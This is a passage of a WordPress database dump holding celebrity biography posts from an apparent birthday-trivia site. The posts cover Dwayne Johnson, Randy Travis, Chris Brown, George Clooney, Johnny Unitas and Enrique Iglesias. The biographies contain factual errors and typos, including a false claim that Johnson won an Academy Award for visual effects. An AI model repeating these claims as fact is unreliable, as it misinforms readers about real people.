he defeated the Brooklyn Brawler.\r\n\r\nThe WWF played heavily into Johnson’s lineage, touting him a the WWF’s first third generation wrestler, and giving him the name Rocky Maivia. Eventually this name was rejected and he would finally become The Rock until such time as he left the WWE in 2004, taking his namesake with him per a dual ownership contract between himself and the WWE.\r\n\r\nThe Rock made a return to WWE in 2011, hosting an episode of Raw, which saw him return to the arena for the first time in nearly seven years. He has continued to make part time appearances over the years, once even sustaining a legitimate injury during a Wrestlemania match. At this time, he is working on his film career.\r\n\r\nBecause of Dwayne Johnson’s lucrative wrestling career, it was no surprise that he was able to move into mainstream pop culture. He started by appearing in Wyclef Jean’s single and music video ‘It Doesn’t Matter’, and even hosted Saturday Night live in 2000.This Saturday Night Live episode garnered enough success that it spawned offers from multiple Hollywood studios. As a result, Johnson would take guest roles on shows such as Star Trek: Voyager and That 70’s Show. One of Johnson’s most well-known movie appearances was his tenure in The Scorpion King series which has spawned two sequels so far.\r\n\r\nThe Rock has appeared virtually everywhere, including the Disney channel show, Cory in the House. He has won several awards, including the Academy Award for Best visual Effects, and was nominated Favorite Movie Actor at the 2008 Nickelodeon Kids’ Choice wards, though he lost to Johnny Depp in Pirates of the Caribbean: At World’s End.\r\n\r\nPerhaps the most famous of The Rock’s appearances were those of the Fast and Furious film series, as The Rock appeared in Fast Five as Luke Hobbs, a Diplomatic Security Service agent. He was tasked with hunting down the protagonists, the idea coming from Vin Diesel after he learned that fans wanted to see he and Johnson appear in a film together.\r\n\r\nOn December 16, 2013, <a href=\"http://www.forbes.com/profile/dwayne-johnson/\" target=\"_blank\">Forbes</a> gave Johnson the title of top-grossing actor of 2013. In addition to that, Forbes gave The Rock credit for the massive success of Fast 6 which grossed nearly one billion dollars worldwide.\r\n<h2>Most Known For</h2>\r\nThe Rock is obviously known mostly for his <a href=\"http://www.impeccabledwaynejohnson.org/pages/wrestling-career/\" target=\"_blank\">wrestling career</a>, but a close second would be his work in the extremely popular Fast and Furious movies. It is now widely accepted that he is responsible for breathing new life into an aging franchise.\r\n<h2>Current Personal Life</h2>\r\nIn 1997 Johnson married Dany arcia and their daughter, Simone Alexandria was born in 2001.Currently, he and his wife are separated, though still remain friends.\r\n\r\nJohnson Co-Wrote his autobiography with Joe Layden under the title: The Rock Says, which Debut at No .1 on the New York Times bestseller list.\r\n\r\nDwayne has also founded <a href=\"http://dwaynejohnsonlive.net/tag/the-rock-foundation/\" target=\"_blank\">Dwayne Johnson’s Rock Foundation</a>, a charity that works with at-risk and terminally ill children. As a further charitable measure, he and his ex-wife donated $1 million to the University of Miami for the renovation of their football facilities. This donation has been noted as the largest ever given to the university’s athletics department, and it even earned a change in name for the locker room in Johnson’s honor. As of 2015, Johnson is an ordained minister, an ability which he used to officiate the wedding of a superfan.\r\n\r\n<a href=\"https://commons.wikimedia.org/wiki/File:Dwayne_The_Rock_Johnson_2009_Tribeca_portrait.jpg\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Dwayne \"The Rock\" Johnson','','publish','open','open','','dwayne-the-rock-johnson','','','2015-10-14 14:57:29','2015-10-14 14:57:29','',0,'http://birthdaypedia.wpengine.com/?p=6',0,'post','',0),(8,2,'2015-06-23 20:09:07','2015-06-23 20:09:07','','Dwayne The Rock Johnson','','inherit','open','open','','dwayne-the-rock-johnson','','','2015-06-23 20:09:07','2015-06-23 20:09:07','',6,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Dwayne-The-Rock-Johnson.jpg',0,'attachment','image/jpeg',0),(10,2,'2015-05-05 07:18:36','2015-05-05 07:18:36','In the year 1959 Randy Travis was born as the second of six children in <a href=\"https://en.wikipedia.org/wiki/Marshville,_North_Carolina\" target=\"_blank\">Marshville, North Carolina</a>. His father was a horse breeder named Harold Traywick and his mother, a stay at home mom named Bobbie. It became clear at an early age that both he and his brother had their own music talents, and their father encouraged them to pursue them. Having been a fan of Hank Williams, George Jones, and Lefty Frizzel, their father was obviously excited at the prospect of having musicians in the family. Randy Travis, at the age of eight, started to play guitar and sing in church.\r\n\r\nTwo years after that, he, along with his brother, started to perform at local clubs and talent shows under the name: The Traywick Brothers. Randy, often at odds with his father, ended up dropping out of high school and became somewhat of a juvenile delinquent. There were multiple arrests for auto theft and burglary, but in 1975, Randy placed first in a talent show hosted at Country Club USA, a nightclub. The owner, Elizabeth Hatcher hired him on as a cook and allowed him regular singing jobs at the establishment.\r\n\r\nRandy Travis, at least for the moment, would have one more encounter with the law, and the judge overseeing the case, while lenient, promised a much harsher sentence should Travis return to the court. Travis was then released to Hatcher who would become his manager, and from there, Randy Travis would begin focusing on his career.\r\n\r\nIt was in 1978 that Randy would release his first self-titled album for Paula records, but his following two singles are less than successful. Travis was forced to move in with Hatcher which destroyed her marriage, and she moved with Travis to Nashville TN in 1982. Randy and Hatcher eventually formed a romantic relationship, being married at a private ceremony in 1991.\r\n<h2>Career Accomplishments</h2>\r\nIt would be a lie to say that Randy Travis experienced instant success and it would actually be a bit of a disservice to the struggles he overcame to become the country music icon that he did in later years. In the early 1980’s, Randy Travis managed to be rejected by every major record label in Nashville. Most record executives called his style ‘too country’, and Hatcher was forced to take a job as a nightclub manager to support herself and Randy’s sinking career. Randy himself was forced to take on a job at The Nashville Palace where he worked as both a cook and a singer.\r\n\r\nIt was in 1982 that Randy Travis would record his independent album: Live at the <a href=\"http://nashvillepalace.net/\" target=\"_blank\">Nashville Palace</a>, which Hatcher would use to land a deal with Warner Bros. Records. The label executives asked Randy to change his stage name to Randy Travis, and in 1985, Randy finally released “On the other Hand” a single which sat at 67 on the country charts. His next single was called 1982, and it would go on to become a top 10 hit single.\r\n\r\nRandy’s single, in 1986, finally became a number one hit when Warner Brothers released it, and later, he released his ‘debut’ album, Storms of Life, which sold more than four million copies.\r\n\r\nIn 1986, Warner Bros. re-released \"On the Other Hand\", which became Travis\' first number-one hit. He also covered some songs, e.g. of Randy Travis. Randy managed to win the Grammy Award for <a href=\"https://en.wikipedia.org/wiki/Grammy_Award_for_Best_Male_Country_Vocal_Performance\" target=\"_blank\">Best Male Country Vocal Performance</a> for his albums Always & Forever, and Old 8x10. In addition to that he won Best Country Newcomer in 1986. His album Old 8x10 was the first of his to achieve platinum status.\r\n\r\nWhen 1992 rolled around, Randy Travis made what was perhaps an unpopular choice to take a break from his music, and instead concentrated on acting. He starred in a number of westerns, and finally returned to recording in 1994. In 1997 Travis ended his relationship with Warner Brothers and signed a contract with DreamWorks Nashville. His next hits would prove to be great hits, and he recorded the song “Tonight I’m Playin’ Possum” after his good friend George Jones passed away.\r\n\r\nRandy Travis did not stick with country music exclusively. In fact, he chose to delve into Gospel music for a time and released a number of different albums, including a Christmas album titled: Songs of the Season. Finally, in the year 2009, he released his greatest hits album: I Told You So: The Ultimate Hits of Randy Travis. His final released album was Influence Vol. 1: The Man I am. Randy Travis has had a lucrative career that spanned decades, but some things are simply destined to change.\r\n<h2>Most Known For</h2>\r\nUnfortunately, while Randy Travis was an incredible influence on the Country music genre, he is most known for an arrest in 2012 when he was found parked outside of a church wielding an open wine bottle. Of course, if that were all there were to it, it wouldn’t be so noteworthy. The date was August 7, 2012, and State Troopers in Grayson County were called to address a report of an unclothed man lying in the road. That man was Randy Travis, and he had apparently crashed his car in a construction zone, and threatened to kill the state troopers that tried to apprehend him. This DUI arrest had been preceded by Randy walking naked into a Tiger Mart convenience store and demanding cigarettes from the cashier. In 2013, Travis pleaded guilty to the incident, receiving two years probation, a hefty fine, and a 180 day suspended jail sentence.\r\n<h2>Current Personal Life</h2>\r\nTravis found himself admitted to a Dallas hospital for viral cardiomyopathy following an upper respiratory infection. After three days in the hospital, Travis suffered a stroke, prompting a lifesaving surgery to reduce the pressure on his brain. While the surgery was a success, the stroke led to many more problems. For example, Travis has been unable to speak since the surgery and relies on a cane to walk. In fact, he can walk only short distances, but he is relearning how to play the guitar.\r\n<h2>Where Are They Now</h2>\r\nThere is little chance that Randy Travis will record another album, but he did show up at the 2015 ACM awards, and to the delight of his fans, he did Mary his fiancée, Mary Davis on March 21. At the moment, it is unclear as to whether or not Travis is actually able to speak or play guitar, but he is still a considerable influence in the Country Music world.\r\n\r\nImage Credit: istockphoto.com','Randy Travis','','publish','open','open','','country-singer-randy-travist','','','2015-10-14 14:57:55','2015-10-14 14:57:55','',0,'http://birthdaypedia.wpengine.com/?p=10',0,'post','',0),(11,2,'2015-06-23 20:40:53','2015-06-23 20:40:53','','Country Singer Randy Travist','','inherit','open','open','','guitarist','','','2015-06-23 20:42:29','2015-06-23 20:42:29','',10,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Country-Singer-Randy-Travist.jpg',0,'attachment','image/jpeg',0),(12,2,'2015-05-06 08:53:27','2015-05-06 08:53:27','The well-known singer, Chris Brown, was actually born Christopher Maurice Brown on May 5, 1989 in <a href=\"http://www.tappahannock-va.gov/\" target=\"_blank\">Tappahannock Virginia</a>. His mother was Joyce Hawkins, a day care center director, and Clinton Brown, a corrections officer. Music was not a new thing to the Brown family, and it was present in Brown’s life, even from a young age. In the beginning, Brown would listen to soul albums owned by his parents, and eventually, his interests branched out into the <a href=\"http://rap.about.com/od/hiphop101/ss/History-of-Hip-Hop.htm\" target=\"_blank\">hip-hop</a> scene.\r\n\r\nBrown eventually taught himself to sing and dance, citing Michael Jackson as one of his earliest inspirations. In addition to singing for himself, Chris Brown sung in his church choir along with performing in a number of local talent shows. His mother eventually saw his talent for what it was, and began looking for a record deal. Though there were many personal issues occurring in Brown’s life at the time, he managed to become ‘discovered’ by Hitmission Records at the age of thirteen.\r\n\r\nTina Davis, a senior A&R executive was impressed by Brown’s work and took him to meet the former president of the Island Def Jam Music Group who immediately offered to sign him to a contract. Negotiation continued for two months however, and Tina Davis managed to lose her job due to a corporate merger. Davis would become Brown’s manager in short order, and promoted him to several labels including:\r\n<ul>\r\n <li>Jive Records</li>\r\n <li>J-Records</li>\r\n <li>Warner Bros. Records</li>\r\n</ul>\r\nDuring that time, Jive Records was doing a considerable amount of marketing for young people including Britney Spears and Justin Timberlake. For this reason, Brown chose Jive, mainly due to their success in the pop area. While working on his musical career, Brown would attend Essex High School in Virginia until 2005, at which point he finally moved to New York City. From there, Chris Brown’s Career would skyrocket.\r\n<h2>Career Accomplishments</h2>\r\nThough Chris Brown would release several albums, one of his most notable is the self-titled album, Chris Brown, which was released on November 29, 2005. It debuted at Number Two on the Billboard 200 within the first week, and sales amounted to 154,000 copies. Selling two million copies in the United States, Chris Brown was considered a commercial success. In addition to that, his album was certified double platinum by the <a href=\"https://www.riaa.com/\" target=\"_blank\">RIAA</a>.\r\n\r\nThe first single from his debut album, “Run It!” would reach the top of the Billboard Hot 100, and three other singles actually managed to sit in the top twenty.\r\n<h2>Most Known For</h2>\r\nThough Chris Brown has had a considerable music career, that is sadly not what he is most known for. Chris Brown, while dating fellow recording artist Rihanna, entered into an argument on February 8, 2009 which escalated, leading Christ Brown to initiate a physical altercation. This altercation led to a number of visible facial injuries for Rihanna, prompting, Chris Brown to turn himself in to the LAPD. He was booked under the charge of making criminal threats, though the name of the victim was not released by the police department at that time, as per their policy.\r\n\r\nThe media, however, quickly caught wind of Rihanna falling victim to Brown’s violent behavior. Following the assault and arrest, a number of commercial advertisements featuring Brown were pulled from the networks, and his music was removed from many radio stations. In addition to that, Brown was forced to withdraw from the 2009 Grammy awards. Additionally, he was forced to hire a crisis management team to help deal with the plethora of negative publicity he was receiving.\r\n\r\nIn the end, Brown managed to work out a deal in which he would plead guilty to a felony, accepting a plea deal of community service, five years probation, and domestic violence counseling. The sentence was protested by a number of domestic violence groups as they believe the singer was treated with kid gloves due to their status.\r\n<h2>Current Personal Life</h2>\r\nAs of right now, Chris Brown is planning a tour across several states under the name “ONE HELL OF A NITE TOUR”. The tour will begin on August 12 and include several special guests from Omarion, Fetty Wap, and many more.\r\n<h2>Where Are They Now</h2>\r\nBrown was once again arrested for felony assault in 2013 after punching two men who attempted to have their photo taken with him on the streets of Washington DC. Brown completed 90 days in jail and was remanded to a treatment facility on the condition that he would complete rehab or report directly to jail. Brown violated internal rules and was sent to jail. For the probation violation, Brown was ordered to serve 132 days in jail, and was given early release due to jail overcrowding.\r\n\r\nAs of February 25, 2015, he was rejected entry to Canada due to his <a href=\"http://jezebel.com/5885776/everything-you-need-to-know-about-chris-brown\" target=\"_blank\">criminal history</a>, and will therefore be unable to tour there during his upcoming One Hell of a Nite Tour. Though Brown has had his share of legal troubles, he is in fact expected to continue recording music, and most importantly will be continuing his tour of the United States. There are those who would say that Brown is a despicable human being, but his impact on popular culture simply cannot be denied one way or another.\r\n\r\n<a href=\"https://www.flickr.com/photos/expressmonorail/2481070968/sizes/l\" target=\"_blank\">Image Credit</a>\r\n\r\n ','Chris Brown','','publish','open','open','','pop-singer-chris-brown','','','2015-10-14 14:58:49','2015-10-14 14:58:49','',0,'http://birthdaypedia.wpengine.com/?p=12',0,'post','',0),(14,2,'2015-06-23 21:39:10','2015-06-23 21:39:10','','Pop Singer Chris Brown','','inherit','open','open','','pop-singer-chris-brown','','','2015-06-23 21:39:16','2015-06-23 21:39:16','',12,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Pop-Singer-Chris-Brown.jpg',0,'attachment','image/jpeg',0),(15,2,'2015-05-07 07:14:41','2015-05-07 07:14:41','When George Clooney was born in Lexington, Kentucky in 1961, no one could have suspected what kind of success he would be. He was born to his mother, Nina Bruce, both a beauty queen and a city councilwoman. His father, Nick Clooney had already been in show business, having been a former anchorman and a game show host. In addition to that, his aunt had already achieved fame as a cabaret singer and actress by the name of Rosemary Clooney. In fact, he has several cousins that work as actors including:\r\n<ul>\r\n <li>Miguel Ferrer</li>\r\n <li>Rafael Ferrer</li>\r\n <li>Gabriel Ferrer</li>\r\n</ul>\r\nAdditionally, Rafael is married to the singer, Debby Boon.<strong> </strong>\r\n\r\nIn his early years, Clooney would attend Blessed Sacrament School in Fort Mitchell, Kentucky, but spent a great deal of his time in Ohio. In Ohio he would attend St. Michael’s School in Columbus, and Western Row Elementary school in Mason, Ohio. During his final years in Ohio, he spent his time as an alter boy at St. Susanna School in Mason. Midway through the seventh grade however, the Clooney’s would move back to Kentucky, and George would be diagnosed with <a href=\"http://www.webmd.com/brain/tc/bells-palsy-topic-overview\" target=\"_blank\">Bell’s palsy</a>, suffering paralysis of the face. The condition, however, disappeared in about a year, though he considered the damage to have already been done for his social career.\r\n\r\nWhen his parents moved to Augusta, Kentucky, Clooney of course would attend August high school. There he was a member of both the baseball and basketball team. As a matter of fact, this involvement would lead to him trying out for the Cincinnati Reds in 1977, however he did not make the cut. Instead, he took a journalism major at Northern Kentucky University from 1979 to 1981. He would also attend the University of Cincinnati, but he did not graduate from either university. Instead, he would make his living selling women’s shoes and insurance door to door, which was a lucrative business opportunity in the pre-internet days. He would also work construction and cut tobacco for a living.\r\n<h2>Career Accomplishments</h2>\r\nThe first time that Clooney would appear on screen was as an extra in a mini-series called <a href=\"https://en.wikipedia.org/wiki/Centennial_(miniseries)\" target=\"_blank\">Centennial</a> which was filed in 1978. The film was shot partly in Clooney’ hometown, Augusta Kentucky, which made it very easy for him to score a role, but his first major role would start in 1984, and it is not the role that most remember him for.\r\n\r\nThe first major role that Clooney scored was in a sitcom called E/R, which is NOT the hospital drama. Following that, he would play a handyman on The Facts of Life, and even appeared as a detective on an episode of The Golden Girls. Finally, he took on a regular role on the show Rosanne, as Rosanne Barr’s supervisor. When 1988 rolled around, Clooney would play a role in the film ‘Return of the Killer Tomatoes’, during which time he took a course at the Beverly Hills Playhouse acting school, an endeavor which would last for a period of five years.\r\n\r\nIn 1994, Clooney would take on the job that catapulted him to fame, playing Dr. Doug Ross on the hit NBC show ER. This was a regular role that would last from 1994 to 1999, and though he left the show in 1999, he would make a cameo appearance in season 6, and took on a guest spot in the final season. His work on this show would earn him two Emmy Award nominations along with three Golden Globe awards nominations for Best Actor.\r\n\r\nThough Clooney received high praise for his work on ER, it was not the only project he had in the pipeline. During his time on the show he worked in several movies, one of which was the hit film: ‘From Dusk till Dawn’. In addition to that he would play in the romantic comedy: ‘One Fine Day’ alongside Michelle Pfeiffer. He also played in ‘The Peacemaker’ with Nicole Kidman.\r\n\r\nLeaving ER seemed to open the floodgates of success for Clooney as he quickly starred in three very successful films. These included: ‘The Perfect Storm’, ‘O Brother, Where Art Thou’, and finally, signed a contract to appear in the movie Ocean’s Eleven which was a remake of the 1960’s film by the same name. Following that, there would be Ocean’s Twelve and Ocean’s Thirteen, which both saw the return of Clooney as the main character.\r\n\r\nClooney made his directorial debut with the 2002 film ‘Confessions of a Dangerous Mind’ which was based on the autobiography of Chuck Barris. The film was essentially a box office failure, but critics stated that Clooney showed promise with his directing skills. In 2006,. Clooney would finally win the Oscar for his role in the movie Syriana.\r\n\r\nClooney has won a number of awards throughout his career which include two Academy Awards, Best Picture for Argo, a BAFTA, and of course a Golden Globe for his role in the hit movie The Descendants. His fame however, stretches far beyond the silver screen.\r\n<h2>Most Known For</h2>\r\nAs far as acting is concerned, George Clooney is mostly known for his work on the television show ER, but outside of acting, he is known for a considerable amount of <a href=\"https://www.looktothestars.org/celebrity/george-clooney\" target=\"_blank\">humanitarian work</a>. For example, Clooney has become involved with an organization called ‘Not on Our Watch Project’ which focuses on stopping global atrocities. He, for example, helped to organize the Telethon ‘Hope ofr Haiti Now’ following the 2010 Haiti earthquake.\r\n\r\nHe has been notably involved in a number of other humanitarian activities including staged re-enactment called ‘8’ which reenacted the federal trial responsible for overturning California’s Prop 8 ban on same sex marriage. These efforts however, were a bit closer to home, and Clooney has been responsible for several acts that stretch beyond the borders of the United States. Clooney, for example, has been advocating a resolution to he Darfur conflict, having spent ten days in Chad and Sudan with his father in the interest of producing a TV special titled: “A Journey to Darfur”.\r\n\r\nIn an arguably controversial move, George Clooney staged a display of civil disobedience outside the Sudanese Embassy for which he was arrested. Alongside him, was Martin Luther King III.\r\n<h2>Current Personal Life</h2>\r\nClooney’s persona life has been relatively interesting having dated Kelly Preston from 1987 to 1989. In addition to that, he was married to Talia Balsam from 1989 to 1993. He dated several other women, though When he became engaged to human rights lawyer Amal Alamuddin, a British tabloid made claims that his fiancé’s mother actually opposed the marriage on religious grounds. This story was of course false, and the tabloid did issue an apology. Clooney, however, refused to accept the apology and criticized the tabloid severely. Clooney and Alamuddin were married on September 27, 2014, despite the apparently objections of the Daily Mail.\r\n<h2>Where Are They Now</h2>\r\nClooney is still heavily involved in humanitarian work and does still star in movies. Right now, he is expected to star in the movie Tomorrowland which will undoubtedly be a box office hit.\r\n\r\n<a href=\"https://www.flickr.com/photos/23603714@N00/6183503980/sizes/o/\" target=\"_blank\">Image Credit</a>\r\n\r\n ','George Clooney','','publish','open','open','','george-clooney','','','2015-10-14 14:59:08','2015-10-14 14:59:08','',0,'http://birthdaypedia.wpengine.com/?p=15',0,'post','',0),(16,2,'2015-06-24 13:17:39','2015-06-24 13:17:39','','George Clooney','','inherit','open','open','','george-clooney-toronto-int-film-festival-2011-1565','','','2015-06-24 13:18:38','2015-06-24 13:18:38','',15,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/George-Clooney.jpg',0,'attachment','image/jpeg',0),(17,2,'2015-05-08 07:21:50','2015-05-08 07:21:50','It was in 1933, in Pittburgh Pennsylvania that the football world would change forever, even if it wouldn’t be realized for many years. John Constantine Unitas was born to Leon Unitas and Helen Superfisky, but by the time Johnny was five years old, his father would die of cardiovascular renal disease, causing him to be raised by his mother who would be forced to work two jobs in order to support her family. Unitas would attend high school and play on the team as a <a href=\"http://www.dummies.com/how-to/content/the-quarterbacks-job-in-a-football-game.html\" target=\"_blank\">quarterback</a>, and after high school, he would begin to seek an opportunity to play college ball. The University of Louisville gave him the chance he needed, and Unitas departed Pennsylvania to seek his future in the great state of Kentucky.\r\n\r\nUnitas had an outstanding career at Louisville, but in 1952, the new president of the university, Dr. Philip Grand Davidson reduced the funding to the athletic programs and installed stricter academic standards for athletes. With that being the case, fifteen players failed to meet those standards and lost their scholarship. Unitas, however, would take on square dancing as an elective, and thereby kept his scholarship. From there on out, his career became even more impressive, helping to bring wins against top schools like Wayne State and Florida State. During his sophomore year at Louisville, Unitas completed 106 of 198 passes.\r\n<h2>Career Accomplishments</h2>\r\nFollowing college, Unitas was drafted by the <a href=\"http://www.steelers.com/\" target=\"_blank\">Pittsburgh Steelers</a>, but he was released before the beginning of the season due to three other quarterbacks attempting to fill the spots. The head coach for the Steelers believed that Unitas was not smart enough to fill the quarterback spot, and therefore failed to give Unitas a chance. At this point, Unitas left the pro football scene and married. He worked construction, and played football on the weekends for a local semi-professional team.\r\n\r\nIn 1956 Unitas managed to join the Baltimore Colts, and there were some rough patches in the beginning. For example, during a game against the Chicago Bears his first pass was intercepted and he even managed to fumble during a play. He did manage to recover however, and from there on out, his career was solidified, particularly in 1958.\r\n\r\nPlaying for the Colts in 1958, Unitas helped to defeat the New York Giants 23-17 in a sudden death overtime. While this might not sound like a big deal today, there had never been an overtime in <a href=\"http://www.nfl.com/history\" target=\"_blank\">NFL history</a> until that day. When this game is referred to, it is called ‘The Greatest Game Ever Played’. In fact, this game is generally referenced as the reason for the rise in the popularity of football in the 60’s.\r\n\r\nUnitas went on to earn several awards including his first MVP in 1959. Unfortunately, the Colts’ success began to decline in the early 1960’s, but Unitas would win a second MVP, finishing with 2,824 yards passing. Unitas won a third MVP in 1967, at which point he began to complain of ‘<a href=\"http://www.webmd.com/osteoarthritis/guide/tennis-elbow\" target=\"_blank\">tennis elbow</a>’. In the last game of the 1968 pre-season Unitas suffered an injury when hit by a member of the Dallas Cowboys defense , causing him to spend the rest of the season sitting on the bench. In Super Bowl III, Unitas came off the bench, and even managed to rebound later with a considerable amount of physical therapy.\r\n\r\nUnitas left the colts in 1973 after being traded to the San Diego Chargers, though he was arguably past his prime. Unitas ended up retiring in 1974 after 18 season in the NFL, his stats being as follow:\r\n<ul>\r\n <li>2,830 Completions</li>\r\n</ul>\r\n<ul>\r\n <li>290 Touchdowns</li>\r\n</ul>\r\n<ul>\r\n <li>253 Interceptions</li>\r\n</ul>\r\nIn addition to that he was the first quarterback to throw more than 40,000 yards, which is impressive in an era when NFL teams played shorter seasons. Though Unitas had a good run, all things must come to an end, and in his post-football days, he settled in Baltimore to raise his family. He immediately pursued a career in broadcasting, and would do commentary for NFL games on CBS. He was elected to the Pro Football Hall of Fame in 1979 and following that, he was inducted into the American Football Association’s Semi Pro Football Hall of Fame in 1987.\r\n<h2>Most Known For</h2>\r\nUnitas is remembered as the league’s best player, perhaps being partially responsible for the NFL’s return to Baltimore (The Ravens), where he often stood on the sidelines during their games.\r\n\r\nAs his life drew to a close, Unitas would draw heavy attention to the permanent physical injuries that both he and his fellow players would endure in their careers before the introduction of heavy padding.\r\n<h2>Current Personal Life</h2>\r\nThe 18 years of NFL play took a toll on Unitas, and he spent the remaining years of his life hobbled. In addition to that, his elbow injury rendered him unable to use his right hand, though he did spend some time playing golf.\r\n<h2>Where Are They Now</h2>\r\nOn September 11, 2002, Unitas suffered a heart attack that claimed his life while undergoing treatment at the Kernan Physical Therapy Center. A statue of him was erected in front of a stadium named in his honor, ensuring that he will always be remembered. He is buried at Dulaney Valley Memorial Gardens, Timonium, Maryland.\r\n\r\nImage Credit: istockphoto.com\r\n\r\n ','John Constantine Unitas','','publish','open','open','','john-constantine-unitas','','','2015-10-14 15:48:14','2015-10-14 15:48:14','',0,'http://birthdaypedia.wpengine.com/?p=17',0,'post','',0),(20,2,'2015-06-24 14:15:01','2015-06-24 14:15:01','[vc_row][vc_column][td_block_big_grid_3][vc_column_text css_animation=\"right-to-left\"]\r\n<h1>Staff Favorites</h1>\r\n[/vc_column_text][td_block_6 limit=\"6\" offset=\"4\"][vc_column_text css_animation=\"appear\"]\r\n<h1>People you should know</h1>\r\n[/vc_column_text][td_block_big_grid_4 offset=\"10\"][/vc_column][/vc_row]','Home','','publish','open','open','','20-2','','','2017-01-27 19:51:54','2017-01-27 19:51:54','',0,'http://birthdaypedia.wpengine.com/?page_id=20',0,'page','',0),(21,2,'2015-06-24 14:26:05','2015-06-24 14:26:05','','John Constantine Unitas','','inherit','open','open','','john-constantine-unitas','','','2015-06-24 14:26:05','2015-06-24 14:26:05','',17,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/John-Constantine-Unitas.jpg',0,'attachment','image/jpeg',0),(22,2,'2015-05-11 07:29:14','2015-05-11 07:29:14','Though you have undoubtedly heard the name of Enrique Iglesias there is a good chance that you have no idea who he is, other than the fact that he is a singer. Actually, Enrique Iglesias is a Spanish singer, having been born in Madrid Spain to the Spanish singer Julio Iglesias and magazine journalist Isabel Preysler. He has a massive family, though his parents divorced in 1979. In the beginning, Iglesias and his two siblings remainedwith their mother, however in 1986, his grandfather was kidnapped by a terrorist group and in the interest of their safety, they were sent to live in Miami. Raised mostly by their nanny, Elvira Olivares, Enrique would later dedicate his very first album to her. In his formative years, he attended the Gulliver Preparatory School, and would then study business at the University of Miami.\r\n\r\nThough Enrique had plans for a musical career, he did not want to let his father in on the process, and was concerned that his surname would actually help advance his career, which he did not want. Instead, he hoped to succeed on his own merit. That being the case, he made the choice to borrow money from the family nanny, and he recorded a demo cassette tape which contained a Spanish song and two English songs. He used his father’s former publicist Fernan Martinez to promote the songs using the stage name Enrique Martinez. He led everyone to believe that he was an unknown singer from Guatemala, and under his own merit, did manage to work out a deal with Fonovisa Records. He dropped out of college and made the trip to Toronto to record his first album.\r\n<h2>Career Accomplishments</h2>\r\n<strong>1995–96: <em>Enrique Iglesias</em></strong>\r\n\r\nOn July 12, 1995, Iglesias released <a href=\"https://en.wikipedia.org/wiki/Enrique_Iglesias_(album)\" target=\"_blank\"><em>Enrique Iglesias</em></a>, a collection of light rock ballads, including hits such as \"<a href=\"https://en.wikipedia.org/wiki/Si_T%C3%BA_Te_Vas_(Enrique_Iglesias_song)\" target=\"_blank\">Si Tú Te Vas</a>\", \"<a href=\"https://en.wikipedia.org/wiki/Experiencia_Religiosa\">Experiencia Religiosa</a>\", and others. The record sold half a million copies in its first week, a rare accomplishment then for an album recorded in a language other than English, going Gold in <a href=\"https://en.wikipedia.org/wiki/Portugal\" target=\"_blank\">Portugal</a> within the first week of release, and sold over a million copies in the next three months.\r\n\r\nHis song \"<a href=\"https://en.wikipedia.org/wiki/Por_Amarte\" target=\"_blank\">Por Amarte</a>\" was included in <a href=\"https://en.wikipedia.org/wiki/Televisa\" target=\"_blank\">Televisa</a>\'s <a href=\"https://en.wikipedia.org/wiki/Telenovela\" target=\"_blank\">telenovela</a> <em>Marisol</em>, but with a twist: instead of <em>Por amarte daría mi vida</em> (To love you, I\'d give my life), the words were <em>Por amarte Marisol, moriría</em> (To love you, Marisol, I\'d die). The CD also yielded Italian and Portuguese editions of the album, with most of the songs translated into those languages.\r\n\r\nFive singles released from this album, such as \"Por Amarte\", \"<a href=\"https://en.wikipedia.org/wiki/No_Llores_Por_M%C3%AD\" target=\"_blank\">No Llores Por Mí</a>\", and \"<a href=\"https://en.wikipedia.org/wiki/Trapecista\">Trapecista</a>\" topped the Billboard\'s Latin charts. The album went on to win Iglesias a <a href=\"https://en.wikipedia.org/wiki/Grammy_Award\" target=\"_blank\">Grammy Award</a> for Best Latin Pop Performance.\r\n\r\nThroughout his career, Enrique won a total of 16 Billboard Music Awards, 36 Billboard Latin Music Awards, 1 Grammy, 4 Latin Grammies, and 10 World Music Awards. In the year 2000 he was awarded Most Fashionable Artist at the VH1/Vogue Fashion Awards. He won a number of other awards throughout his career. In fact, he won an award for Most Successful Spanish Artist of the Decade at Premios Ondas in 2002. That, in itself, is an impressive feat.\r\n<h2>Most Known For</h2>\r\nWhile singing is most arguably his forte, Iglesias is well known for his work in several charity projects including, first of all, download to Donate, started by Music For Relief. He co-produced the album “Download to Donate for Haiti, a charity album for an earthquake that shook Haiti in 2010. This album was collaborated with Mike Shinoda, both of which promoted the album at different venues.\r\n\r\nTrue to form, Iglesias urged his fans and followers to donate money through the American Red Cross in the interest of helping victims of Typhoon Haiyan in the Philippines. The typhoon in question had horrible timing as it struck literally one month following a 7.2 magnitude earthquake which destroyed the homes of nearly 350,000 people.\r\n\r\nIn addition to those causes, Iglesias has supported the following:\r\n<ul>\r\n <li>City of Hope</li>\r\n <li>Habitat for Humanity</li>\r\n <li>Help for Heroes</li>\r\n <li>Live Earth</li>\r\n <li>Muscular Dystrophy Association</li>\r\n <li>Special Olympics</li>\r\n <li>Music for Relief</li>\r\n <li>Salvation Army</li>\r\n <li>Hunger Relief</li>\r\n</ul>\r\n<h2>Current Personal Life</h2>\r\nIn his personal life, Iglesias underwent surgery in 2003 to remove a circular mole from the right side of his face due to concerns over potential cancer. Additionally, he began dating <a href=\"http://www.latinpost.com/articles/37822/20150214/enrique-iglesias-anna-kournikova-relationship-news-2015-source-alleges-couple-will-marry-on-valentines-day.htm\" target=\"_blank\">Anna Kournikova</a>, the world renowned tennis player in 2001, though split with her after twelve years in 2013. Following that, however, it has been reported as of 2014, that they are back together living in his Miami mansion worth $26 million.\r\n\r\nIglesias received surgery in 2003 to remove a circular mole from the right side of his face, citing possible concerns that over time it could become cancerous.\r\n<h2>Where Are They Now</h2>\r\nEnrique is still recording music and supporting worthy causes. Additionally, he uses social media to keep in touch with his fans, from Facebook, to Twitter, and even Instagram. He has achieved success, but seems to have remembered well that the fans make him who he is, at least as far as his fame is concerned.\r\n\r\n<a href=\"https://www.flickr.com/photos/dawilson/8218870399/sizes/l\" target=\"_blank\">Image Credit</a>','Enrique Iglesias','','publish','open','open','','enrique-iglesias','','','2015-10-14 15:50:31','2015-10-14 15:50:31','',0,'http://birthdaypedia.wpengine.com/?p=22',0,'post','',0),(24,2,'2015-06-24 14:37:55','2015-06-24 14:37:55','','Enrique 